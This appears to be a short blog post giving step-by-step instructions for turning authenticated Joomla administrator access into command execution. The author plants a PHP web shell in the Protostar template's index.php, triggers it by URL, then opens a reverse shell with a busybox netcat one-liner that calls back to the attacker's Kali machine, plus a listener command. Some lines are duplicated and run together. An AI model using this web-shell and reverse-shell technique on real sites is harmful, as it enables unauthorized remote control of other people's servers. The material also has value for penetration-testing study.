May 30, 2026
Getting command execution/ Rev Shell from Joomla admin panel
Once you have successfully authenticated to the Joomla administrator dashboard, you can leverage the built-in template manager to achieve…
Marinovharisan
1 min read
Once you have successfully authenticated to the Joomla administrator dashboard, you can leverage the built-in template manager to achieve code execution. This technique is highly effective when exploring an environment for initial access or pivoting.
After login on the left click on Templates
then, use the second template Protostar it is easier to work with
And edit the index.php and after you finish, click the green SAVE button on the top left
I replace it with PHP cmd from https://www.revshells.com/ becaue it gives me more flexability, but you can use PHP PentestMonkey or PHP Ivan Sincek for direct shell, or whatever you want
After that to trigger the code navigate to:
http://{targetIP}/index.php
# OR directly via the template path:
http://{targetIP}/templates/protostar/index.phphttp://{targetIP}/index.php
# OR directly via the template path:
http://{targetIP}/templates/protostar/index.phpAnd you get code execution
If you are like me, I usually then use the busybox shell to get Revers Shell
busybox nc {Kali_IP} {Listening_Port}-e /bin/shbusybox nc {Kali_IP} {Listening_Port}-e /bin/shP.S. Dont forget to start your Netcat listener:
nc -nvlp 4444nc -nvlp 4444